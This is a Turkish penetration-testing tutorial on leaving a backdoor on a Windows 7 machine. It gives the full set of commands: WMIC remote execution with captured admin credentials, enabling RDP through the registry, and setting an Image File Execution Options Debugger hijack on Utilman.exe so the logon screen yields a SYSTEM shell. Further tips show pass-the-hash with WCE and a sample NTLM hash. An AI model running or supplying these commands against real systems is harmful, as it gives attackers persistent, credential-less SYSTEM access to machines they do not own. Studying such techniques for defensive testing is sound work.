Wmic Aracı ve Yerel Yönetici Hakları ile Komut Çalıştırılabilen Windows İşletim Sistemi Üzerinde Image File Execution Options Özelliğinin Kötüye Kullanılarak Arka Kapı Bırakılması

Windows işletim sisteminde yetkili hesap hakları ile ele geçirilen oturumda, Kayıt Defteri üzerinde gerçekleştirilebilecek bir değişiklik ile işletim sistemine uzak masaüstü ekranında bir arka kapı bırakılabilir. Böylece, kullanıcı hesap parolaları değişse bile, Windows oturum açma ekranına erişim sağlanabiliyor ise Windows komut satırı SYSTEM hakları ile elde edilebilir. Bu yazıda, gerekli önlemler alınmamış ve Wmic aracı ile ağ üzerinden komut çalıştırılabilen bir Windows 7 bilgisayarda, Image File Execution Options özelliği kötüye kullanılarak, kimlik bilgileri olmadan oturum açılabileceği görülecektir.

Mevcut durumda 10.68.35.150 IP adresli bilgisayara uzaktan erişim sağlanamamaktadır.

telnet 10.68.35.150 3389

Komut satırından uzak masaüstü bağlantısını açmak için kullanılabilecek komut aşağıdaki gibidir.

C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

Sızma testleri sırasında, 10.68.35.150 IP adresli bilgisayarda, yerel yönetici haklarına sahip bir kullanıcının erişim bilgilerinin Derya/Dd123456 olacak şekilde elde edilmiş olsun. Bu kullanıcıya ait erişim bilgileri ve Wmic aracı kullanılarak, uzak masaüstü bağlantısı aşağıdaki gibi etkinleştirilebilir.

wmic /node:10.68.35.150 /user:Derya /password:Dd123456 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’

Normalde standart bir Windows 7 bilgisayarın oturum açma ekranı aşağıdaki gibidir. Windows oturum açma ekranında iken, Windows+U tuş takımına basıldığında veya sol alttaki ikona basıldığında, Utilman.exe adlı bir uygulama çalışır. Böylece, Ease of Access ekranı ile karşılaşılır.

 

Not: Benzer uygulamalar aşağıdaki gibi sıralanabilir.

• Sethc.exe –> Tetiklleyici: 5 kere Shift tuşu
• Utilman.exe –> Tetiklleyici: Windows tuşu + U
• Osk.exe –> Tetiklleyici: Ekrandaki On-screen tuşu
• Magnify.exe –> Tetiklleyici: Windows tuşu + =
• Narrator.exe –> Tetiklleyici: Windows tuşu + Enter

 

Ease of Access ve Image File Execution Options özelliği kötüye kullanılarak, aşağıdaki komutla Windows 7 bir bilgisayara arka kapı bırakılabilir.

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v Debugger /t REG_SZ /d cmd.exe /f

Hedef bilgisayarda yerel yönetici haklarına sahip Derya kullanıcısının erişim bilgileri ve Wmic aracı kullanılarak, br arka kapı aşağıdaki gibi bırakılabilir:

wmic /node:10.68.35.150 /user:Derya /password:Dd123456 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v “Debugger” /t REG_SZ /d “cmd.exe” /f’

Böylece, belirtilen değişiklikler yapılıp RDP yapıldıktan sonra (veya fiziksel erişim elde edildikten sonra), Windows oturum açma ekranına gelindiğinde, sol alttaki Ease of Access ikonuna tıklandığında (veya Windows+U tuş kombinasyonuna basıldığında), Winlogon.exe prosesinin çalıştığı haklar ile (SYSTEM hakları ile) komut satırı elde edilmiş olur.

İpucu – 1: Hedef bilgisayarda yerel yönetici haklarına sahip kullanıcının erişim bilgileri (Derya\Dd123456) açık olarak biliniyorsa ve Wmic komut satırında bu bilgilerin açık olarak yazılması istenmiyosa; saldırının gerçekleştirileceği bilgisayarda, bu erişim bilgileri ile aynı olacak şekilde bir kullanıcı hesabı oluşturulur ve oluşturulan bu kullanıcı ile oturum açılabilir. Böylece, hedef bilgisayardaki yerel yöneticinin parolası açık bir şekilde yazılmamış olur. Bu durumda kullanılabilecek komutlar sırasıyla aşağıdaki gibidir.

wmic /node:10.68.35.150 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’
wmic /node:10.68.35.150 process call create ‘C:\Windows\system32\reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v “Debugger” /t REG_SZ /d “cmd.exe” /f’

İpucu – 2: Hedef bilgisayarda yerel yönetici haklarına sahip kullanıcının erişim bilgileri (Derya\Dd123456) açık olarak bilinmiyor, ancak bu kullanıcıya ait parola özeti (aad3b435b51404eeaad3b435b51404ee:b76da09e06b5a4c0e1feed803cc2fde9) biliniyorsa; saldırının gerçekleştirileceği bilgisayara ait RAM üzerindeki erişim bilgileri WCE aracı ile değiştirilir. Bu durumda kullanılabilecek komutlar sırasıyla aşağıdaki gibidir.

wce -s WORKGROUP:Derya:aad3b435b51404eeaad3b435b51404ee:b76da09e06b5a4c0e1feed803cc2fde9
wmic /node:10.68.35.150 /user:Derya process call create ‘C:\Windows\system32\reg.exe add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f’
wmic /node:10.68.35.150 /user:Derya process call create ‘C:\Windows\system32\reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v “Debugger” /t REG_SZ /d “cmd.exe” /f’

Not: Parola sorgu ekranının çıkmaması için wmic komutuda parola istenen kısım boş olarak (/password:””) da belirtilebilir.